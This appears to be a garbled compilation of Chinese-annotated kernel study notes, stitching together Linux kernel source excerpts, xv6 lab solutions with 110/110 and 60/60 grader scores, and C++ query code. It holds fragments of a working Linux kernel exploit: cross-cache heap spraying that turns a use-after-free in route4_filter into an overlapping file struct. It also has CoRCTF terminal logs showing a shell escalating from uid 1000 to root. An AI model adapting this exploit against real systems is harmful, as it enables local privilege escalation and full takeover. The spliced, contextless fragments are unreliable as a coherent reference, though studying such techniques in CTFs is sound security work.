structrlimit { /* The current (soft) limit. */ rlim_t rlim_cur; /* The hard limit. */ rlim_t rlim_max; };
结构体中 rlim_cur是要取得或设置的资源软限制的值,rlim_max是硬限制 这两个值的设置有一个小的约束: 1) 任何进程可以将软限制改为小于或等于硬限制 2) 任何进程都可以将硬限制降低,但普通用户降低了就无法提高,该值必须等于或大于软限制 3) 只有超级用户可以提高硬限制 一个无限的限制由常量RLIM_INFINITY指定(The value RLIM_INFINITY denotes no limit on a resource )
rtnl_lock(); tab = rtnl_dereference(rtnl_msg_handlers[protocol]); if (tab == NULL) { tab = kcalloc(RTM_NR_MSGTYPES, sizeof(void *), GFP_KERNEL); if (!tab) goto unlock;
/* ensures we see the 0 stores */ rcu_assign_pointer(rtnl_msg_handlers[protocol], tab); }
old = rtnl_dereference(tab[msgindex]); if (old) { link = kmemdup(old, sizeof(*old), GFP_KERNEL); if (!link) goto unlock; } else { link = kzalloc(sizeof(*link), GFP_KERNEL); if (!link) goto unlock; }
link = rtnl_get_link(family, type); if (!link || !link->dumpit) { family = PF_UNSPEC; link = rtnl_get_link(family, type); if (!link || !link->dumpit) goto err_unlock; } owner = link->owner; dumpit = link->dumpit;
if (type == RTM_GETLINK - RTM_BASE) min_dump_alloc = rtnl_calcit(skb, nlh);
err = 0; /* need to do this before rcu_read_unlock() */ if (!try_module_get(owner)) err = -EPROTONOSUPPORT;
rcu_read_unlock();
rtnl = net->rtnl; if (err == 0) { structnetlink_dump_controlc = { .dump = dumpit, .min_dump_alloc = min_dump_alloc, .module = owner, }; err = netlink_dump_start(rtnl, skb, nlh, &c); /* netlink_dump_start() will keep a reference on * module if dump is still in progress. */ module_put(owner); } return err; }
link = rtnl_get_link(family, type); if (!link || !link->doit) { family = PF_UNSPEC; link = rtnl_get_link(PF_UNSPEC, type); if (!link || !link->doit) goto out_unlock; }
structfile { union { structllist_nodefu_llist; structrcu_headfu_rcuhead; } f_u; structpathf_path; structinode *f_inode;/* cached value */ conststructfile_operations *f_op;
/* * Protects f_ep, f_flags. * Must not be taken from IRQ context. */ spinlock_t f_lock; enumrw_hintf_write_hint; atomic_long_t f_count; unsignedint f_flags; fmode_t f_mode; //读写权限 structmutexf_pos_lock; loff_t f_pos; structfown_structf_owner; conststructcred *f_cred; structfile_ra_statef_ra;
u64 f_version; #ifdef CONFIG_SECURITY void *f_security; #endif /* needed for tty driver, and maybe others */ void *private_data;
#ifdef CONFIG_EPOLL /* Used by fs/eventpoll.c to link all the hooks to this file */ structhlist_head *f_ep; #endif/* #ifdef CONFIG_EPOLL */ structaddress_space *f_mapping; errseq_t f_wb_err; errseq_t f_sb_err; /* for syncfs */ } __randomize_layout __attribute__((aligned(4))); /* lest something weird decides that 2 is OK */
// if the exploit keeps failing, please tune the middle and end int middle = 38; // 38 int end = middle + 40; // 40 // 2-2. spray (38+3)*32 filters in kmalloc-192 & kmalloc-256 printf("[2] spray (38+3)*32 kmalloc-192 & kmalloc-256\n"); for (int i = 0; i < middle; i++) add_tc_basic(sprayfd, i + 1, payload, 193, 32);
add_tc_basic(sprayfd, middle + 1, payload, 193, 32); add_tc_basic(sprayfd, middle + 2, payload, 193, 32); add_tc_basic(sprayfd, middle + 3, payload, 193, 32); if (write(pipe_child[1], "OK", 2) != 2) err(1, "[-] write to parent\n"); // 4. spray more filters in kmalloc-192 & kmalloc-256 if (read(pipe_parent[0], msg, 2) != 2) err(1, "[-] read from parent"); // add_tc_basic(sprayfd, middle+2, payload, 129, 32);
// prepare another part for cross cache printf("[4] spray kmalloc-192 & kmalloc-256\n"); for (int i = middle + 2; i < end; i++) add_tc_basic(sprayfd, i + 1, payload, 193, 32); // 5. free (end-24)*32 kmalloc-192 & kmalloc-256 printf("[5] free (end-24)*32 kmalloc-192 & kmalloc-256\n"); for (int i = 1; i < end - 24; i++) { // prevent double free of 192 and being reclaimed by others if (i == middle || i == middle + 1) continue; delete_tc_basic(sprayfd, i + 1); } if (write(pipe_child[1], "OK", 2) != 2) err(1, "[-] write to parent\n"); // 7. free (end-middle+1)*32 kmalloc-192 & kmalloc-256 if (read(pipe_parent[0], msg, 2) != 2) err(1, "[-] read from parent"); // if (cpu_cores == 1) sleep(1); printf("[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256\n"); delete_tc_basic(sprayfd, middle + 2); delete_tc_basic(sprayfd, middle + 3); delete_tc_basic(sprayfd, 1); for (int i = middle + 2; i < end; i++) delete_tc_basic(sprayfd, i + 1); //getchar(); if (write(pipe_child[1], "OK", 2) != 2) err(1, "[-] write to parent\n"); while (1) {sleep(1000);} }
while (!run_write) {} // wait for thread 1 to prepare write printf("[11-2] write evil data after the slow write\n"); run_spray = 1; if (writev(overlap_a, &iov, 1) < 0) printf("[-] failed to write\n"); }
// Get old limits if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0) printf("Old limits -> soft limit= %ld \t" " hard limit= %ld \n", old_lim.rlim_cur, old_lim.rlim_max); pin_on_cpu(0); printf("[*] starting exploit, num of cores: %d\n", cpu_cores); // open & setup the socket sockfd = socket(PF_NETLINK, SOCK_RAW, 0); assert(sockfd != -1); add_qdisc(sockfd); // 3. allocate a route4_filter (vulnerable object) if (read(pipe_child[0], msg, 2) != 2) err(1, "[-] read from parent"); printf("[3] allocate the vulnerable filter\n"); add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE); // handle = 0
if (write(pipe_parent[1], "OK", 2) != 2) err(1, "[-] write to child"); // 6. 1st free the route4_filter, return the `kmalloc-256` page to the page allocator if (read(pipe_child[0], msg, 2) != 2) err(1, "[-] read from parent");
// free the object, to free the slab printf("[6] 1st freed the filter object\n"); // getchar(); add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE); // handle = 0
// wait for the vulnerable object being freed usleep(500 * 1000); if (write(pipe_parent[1], "OK", 2) != 2) err(1, "[-] write to child"); // 8. spray 4000 unprivileged `file` if (read(pipe_child[0], msg, 2) != 2) err(1, "[-] read from parent");
usleep(1000 * 1000); printf("[8] spray 4000 uprivileged `file`\n"); for (int i = 0; i < spray_num_1; i++) { pin_on_cpu(i % cpu_cores); fds[i] = open("./data2", 1); assert(fds[i] > 0); } // printf("pause before 2nd free\n"); // getchar(); // 9. 2nd free route4_filter, which will free the file printf("[9] 2nd free the filter object\n"); add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE); // handle = 0 printf("pause after 2nd free\n"); // getchar(); // sleep(10000); usleep(1000 * 100); // should not sleep too long, otherwise file might be claimed by others
// 10. spray 5000 unprivileged `file` & find the overlapped file printf("[10] spraying 5000 unprivileged `file`\n"); for (int i = 0; i < spray_num_2; i++) { pin_on_cpu(i % cpu_cores); fd_2[i] = open("./uaf", 1); assert(fd_2[i] > 0); for (int j = 0; j < spray_num_1; j++) { // 10-1. spray one `file` & use kcmp to check if we take up the vulnerable object if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0) { printf("[10-1] found overlapped file, id : %d, %d\n", i, j); overlap_a = fds[j]; overlap_b = fd_2[i]; // 11. start 2 threads: Thread 1-take up write lock; Thread 2-write evil data printf("[11] start 2 threads compete to write\n"); pthread_t pid, pid2; pthread_create(&pid, NULL, slow_write, NULL); pthread_create(&pid2, NULL, write_cmd, NULL);
QueryResult NotQuery::eval(TextQuery &t)const{ auto result=query.eval(t); auto ret_lines= std::make_shared<std::set<int>>(); auto beg=result.begin,end=result.end; auto size=result.get_file()->size(); for(auto n=0;n!=size;n++){ if(beg==end|| *beg!=n){ ret_lines->insert(n); }elseif(beg!=end){ ++beg; } } returnQueryResult(rep(),ret_lines,result.get_file()); }
QueryResult OrQuery::eval(TextQuery &test)const{ auto letf=lhs.eval(test); auto right=rhs.eval(test); auto ret_lines=std::make_shared<std::set<int>>(letf.begin,letf.end); ret_lines->insert(right.begin,right.end); returnQueryResult(rep(),ret_lines,letf.get_file()); }
QueryResult AndQuery::eval(TextQuery &test)const{ auto letf=lhs.eval(test); auto right=rhs.eval(test); auto ret_lines=std::make_shared<std::set<int>>(); std::set_intersection(letf.begin,letf.end,right.begin,right.end,std::inserter(*ret_lines,ret_lines->begin())); returnQueryResult(rep(),ret_lines,letf.get_file()); }
ctf@CoRCTF:/$ /myexp msg_queue_addr:0xffffa041855bf6c0 page_msg_addr:0xffffa041855c1000 kernelbase_addr:0xffffffff9ea00000 init_task_addr:0xffffffff9f6124c0 init_cred_addr:0xffffffff9f633060 pid:0 getpid:86 pid:86 getpid:86 current_task_addr:0xffffa04186128ac0 [+] handler_write_task created [+] handler_write_msg created [*] page fault 1 at page1+0x1000 get_page_msg [+] page fault 2 at page2+0x1000 write msg ok [*] msg next write is ok write task ok debug uid:0 root@CoRCTF:/# id uid=0(root) gid=0(root)
void scheduler(void) { structproc *p; structcpu *c = mycpu(); c->proc = 0; for(;;){ // Avoid deadlock by ensuring that devices can interrupt. intr_on(); int nproc = 0; for(p = proc; p < &proc[NPROC]; p++) { acquire(&p->lock); if(p->state != UNUSED) { nproc++; } if(p->state == RUNNABLE) { // Switch to chosen process. It is the process's job // to release its lock and then reacquire it // before jumping back to us. p->state = RUNNING; c->proc = p; swtch(&c->context, &p->context);
// Process is done running for now. // It should have changed its p->state before coming back. c->proc = 0; } release(&p->lock); } if(nproc <= 2) { // only init and sh exist intr_on(); asmvolatile("wfi"); } } }
// we're about to switch the destination of traps from // kerneltrap() to usertrap(), so turn off interrupts until // we're back in user space, where usertrap() is correct. intr_off();
// send syscalls, interrupts, and exceptions to trampoline.S w_stvec(TRAMPOLINE + (uservec - trampoline));
// set up trapframe values that uservec will need when // the process next re-enters the kernel. p->trapframe->kernel_satp = r_satp(); // kernel page table p->trapframe->kernel_sp = p->kstack + PGSIZE; // process's kernel stack p->trapframe->kernel_trap = (uint64)usertrap; p->trapframe->kernel_hartid = r_tp(); // hartid for cpuid()
// set up the registers that trampoline.S's sret will use // to get to user space. // set S Previous Privilege mode to User. unsignedlong x = r_sstatus(); x &= ~SSTATUS_SPP; // clear SPP to 0 for user mode x |= SSTATUS_SPIE; // enable interrupts in user mode w_sstatus(x);
// set S Exception Program Counter to the saved user pc. w_sepc(p->trapframe->epc);
// tell trampoline.S the user page table to switch to. uint64 satp = MAKE_SATP(p->pagetable);
// jump to trampoline.S at the top of memory, which // switches to the user page table, restores user registers, // and switches to user mode with sret. uint64 fn = TRAMPOLINE + (userret - trampoline); ((void (*)(uint64,uint64))fn)(TRAPFRAME, satp); }
.globl userret userret: # userret(TRAPFRAME, pagetable) # switch from kernel to user. # usertrapret() calls here. # a0: TRAPFRAME, in user page table. # a1: user page table, for satp.
# switch to the user page table. csrw satp, a1 sfence.vma zero, zero
# put the saved user a0 in sscratch, so we # can swap it with our a0 (TRAPFRAME) in the last step. ld t0, 112(a0) csrw sscratch, t0
# restore user a0, and save TRAPFRAME in sscratch csrrw a0, sscratch, a0 # return to user mode and user pc. # usertrapret() set up sstatus and sepc. sret
# interrupts and exceptions while in supervisor # mode come here. # # push all registers, call kerneltrap(), restore, return. # .globl kerneltrap .globl kernelvec .align 4 kernelvec: // make room to save registers. addi sp, sp, -256
// give up the CPU if this is a timer interrupt. if(which_dev == 2 && myproc() != 0 && myproc()->state == RUNNING) yield();
// the yield() may have caused some traps to occur, // so restore trap registers for use by kernelvec.S's sepc instruction. w_sepc(sepc); w_sstatus(sstatus); }
//这个函数是比较关键的设置页表,增加页表项的函数,首先通过调用walk函数得到pte的地址,然后把对应的pa填入页表项,一直重复操作直到需要映射的地址被映射完 int mappages(pagetable_t pagetable, uint64 va, uint64 size, uint64 pa, int perm) { uint64 a, last; pte_t *pte;
a = PGROUNDDOWN(va); last = PGROUNDDOWN(va + size - 1); for(;;){ if((pte = walk(pagetable, a, 1)) == 0) return-1; if(*pte & PTE_V) panic("remap"); *pte = PA2PTE(pa) | perm | PTE_V; if(a == last) break; a += PGSIZE; pa += PGSIZE; } return0; }
// map kernel text executable and read-only. kvmmap(KERNBASE, KERNBASE, (uint64)etext-KERNBASE, PTE_R | PTE_X);
// map kernel data and the physical RAM we'll make use of. kvmmap((uint64)etext, (uint64)etext, PHYSTOP-(uint64)etext, PTE_R | PTE_W);
// map the trampoline for trap entry/exit to // the highest virtual address in the kernel. kvmmap(TRAMPOLINE, (uint64)trampoline, PGSIZE, PTE_R | PTE_X); }
// Allocate a page for the process's kernel stack. // Map it high in memory, followed by an invalid // guard page. char *pa = kalloc(); if(pa == 0) panic("kalloc"); uint64 va = KSTACK((int) (p - proc)); kvmmap(va, (uint64)pa, PGSIZE, PTE_R | PTE_W); p->kstack = va; } kvminithart(); }
// Allocate two pages at the next page boundary. // Use the second as the user stack. sz = PGROUNDUP(sz); uint64 sz1; if((sz1 = uvmalloc(pagetable, sz, sz + 2*PGSIZE)) == 0) goto bad; sz = sz1; uvmclear(pagetable, sz-2*PGSIZE); sp = sz; stackbase = sp - PGSIZE;
// arguments to user main(argc, argv) // argc is returned via the system call return // value, which goes in a0. p->trapframe->a1 = sp;
// Save program name for debugging. for(last=s=path; *s; s++) if(*s == '/') last = s+1; safestrcpy(p->name, last, sizeof(p->name)); // Commit to the user image. oldpagetable = p->pagetable; p->pagetable = pagetable; p->sz = sz; p->trapframe->epc = elf.entry; // initial program counter = main p->trapframe->sp = sp; // initial stack pointer proc_freepagetable(oldpagetable, oldsz);
return argc; // this ends up in a0, the first argument to main(argc, argv)
// Allocate one 4096-byte page of physical memory. // Returns a pointer that the kernel can use. // Returns 0 if the memory cannot be allocated. void * kalloc(void) { structrun *r;
acquire(&kmem.lock); r = kmem.freelist; if(r) kmem.freelist = r->next; release(&kmem.lock); if(r){ memset((char*)r, 5, PGSIZE); // fill with junk } uint64 num=(uint64)r; cow_num[num>>12]++; return (void*)r; } elseif(r_scause()==15){ // printf("taps b\n");
os@os-virtual-machine:~/xxv6/xv6-labs-2020$ ./grade-lab-cow make: “kernel/kernel”已是最新。 == Test running cowtest == (4.9s) == Test simple == simple: OK == Test three == three: OK == Test file == file: OK == Test usertests == (107.3s) (Old xv6.out.usertests failure log removed) == Test usertests: copyin == usertests: copyin: OK == Test usertests: copyout == usertests: copyout: OK == Test usertests: all tests == usertests: all tests: OK == Test time == time: OK Score: 110/110
for (t = all_thread; t < all_thread + MAX_THREAD; t++) { if (t->state == FREE) break; } t->state = RUNNABLE; t->context.sp=(uint64)t->stack+STACK_SIZE-1; t->context.ra=(uint64)func; // YOUR CODE HEREs
}
if (current_thread != next_thread) { /* switch threads? */ next_thread->state = RUNNING; t = current_thread; current_thread = next_thread; /* YOUR CODE HERE * Invoke thread_switch to switch from t to next_thread: * thread_switch(??, ??); */ thread_switch((uint64)&(t->context),(uint64)&(current_thread->context));
structthread { charstack[STACK_SIZE]; /* the thread's stack */ int state; /* FREE, RUNNING, RUNNABLE */ structcontextcontext;
make: “kernel/kernel”已是最新。 == Test uthread == uthread: OK (0.9s) == Test answers-thread.txt == answers-thread.txt: OK == Test ph_safe == make: “ph”已是最新。 ph_safe: OK (10.8s) == Test ph_fast == make: “ph”已是最新。 ph_fast: OK (22.3s) == Test barrier == make: “barrier”已是最新。 barrier: OK (11.1s) == Test time == time: OK Score: 60/60
// Look through buffer cache for block on device dev. // If not found, allocate a buffer. // In either case, return locked buffer. static struct buf* bget(uint dev, uint blockno) { structbuf *b; structbuf *tmp; uint32 bid; bid=HASH(blockno); tmp=0;
// Not cached. // Recycle the least recently used (LRU) unused buffer. // for(b = bcache.head.prev; b != &bcache.head; b = b->prev){ // if(b->refcnt == 0) { // b->dev = dev; // b->blockno = blockno; // b->valid = 0; // b->refcnt = 1; // release(&bcache.lock); // acquiresleep(&b->lock); // return b; // } // } panic("bget: no buffers"); }
// Return a locked buf with the contents of the indicated block. struct buf* bread(uint dev, uint blockno) { structbuf *b; // printf("bread-beg\n"); b = bget(dev, blockno); if(!b->valid) { virtio_disk_rw(b, 0); b->valid = 1; } // printf("bread-end\n"); return b; }
// Write b's contents to disk. Must be locked. void bwrite(struct buf *b) { if(!holdingsleep(&b->lock)) panic("bwrite"); virtio_disk_rw(b, 1); }
// Release a locked buffer. // Move to the head of the most-recently-used list. void brelse(struct buf *b) { uint32 bid; // printf("brelse-beg\n"); bid=HASH(b->blockno); if(!holdingsleep(&b->lock)) panic("brelse"); // printf("re_sleep:%s\n",b->lock.name); releasesleep(&b->lock);
structmsg_queue { structkern_ipc_permq_perm; time64_t q_stime; /* last msgsnd time */ time64_t q_rtime; /* last msgrcv time */ time64_t q_ctime; /* last change time */ unsignedlong q_cbytes; /* current number of bytes on queue */ unsignedlong q_qnum; /* number of messages in queue */ unsignedlong q_qbytes; /* max number of bytes on queue */ structpid *q_lspid;/* pid of last msgsnd */ structpid *q_lrpid;/* last receive pid */
if (!pipelined_send(msq, msg, &wake_q)) { /* no one is waiting for this message, enqueue it */ list_add_tail(&msg->m_list, &msq->q_messages); msq->q_cbytes += msgsz; msq->q_qnum++; atomic_add(msgsz, &ns->msg_bytes); atomic_inc(&ns->msg_hdrs); }
msg = ERR_PTR(-EACCES); if (ipcperms(ns, &msq->q_perm, S_IRUGO)) goto out_unlock1;
ipc_lock_object(&msq->q_perm);
/* raced with RMID? */ if (!ipc_valid_object(&msq->q_perm)) { msg = ERR_PTR(-EIDRM); goto out_unlock0; }
msg = find_msg(msq, &msgtyp, mode); if (!IS_ERR(msg)) { /* * Found a suitable message. * Unlink it from the queue. */ if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) { msg = ERR_PTR(-E2BIG); goto out_unlock0; } /* * If we are copying, then do not unlink message and do * not update queue parameters. */ if (msgflg & MSG_COPY) { msg = copy_msg(msg, copy); goto out_unlock0; }
/* * Lockless receive, part 1: * We don't hold a reference to the queue and getting a * reference would defeat the idea of a lockless operation, * thus the code relies on rcu to guarantee the existence of * msq: * Prior to destruction, expunge_all(-EIRDM) changes r_msg. * Thus if r_msg is -EAGAIN, then the queue not yet destroyed. */ rcu_read_lock();
/* * Lockless receive, part 2: * The work in pipelined_send() and expunge_all(): * - Set pointer to message * - Queue the receiver task for later wakeup * - Wake up the process after the lock is dropped. * * Should the process wake up before this wakeup (due to a * signal) it will either see the message and continue ... */ msg = READ_ONCE(msr_d.r_msg); if (msg != ERR_PTR(-EAGAIN)) { /* see MSG_BARRIER for purpose/pairing */ smp_acquire__after_ctrl_dep();
goto out_unlock1; }
/* * ... or see -EAGAIN, acquire the lock to check the message * again. */ ipc_lock_object(&msq->q_perm);
msg = READ_ONCE(msr_d.r_msg); if (msg != ERR_PTR(-EAGAIN)) goto out_unlock0;
list_del(&msr_d.r_list); if (signal_pending(current)) { msg = ERR_PTR(-ERESTARTNOHAND); goto out_unlock0; }
ctf@CoRCTF:/exp$ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) ctf@CoRCTF:/exp$ /myexp idx:0 [*] get kernel_base_addr... [+] init_ipc_ns: 0xffffffffa603d7a0 [+] kernel_base: 0xffffffffa5400000 [+] init_task: 0xffffffffa60124c0 [+] init_cred: 0xffffffffa6033060 [*] search this process task_struct 0 86 86 86 [*] get this process task_struct:0xffff8d5c46128040 [*] now write for cred idx:1 getshelling [*]----getshell ok root@CoRCTF:/exp# id uid=0(root) gid=0(root)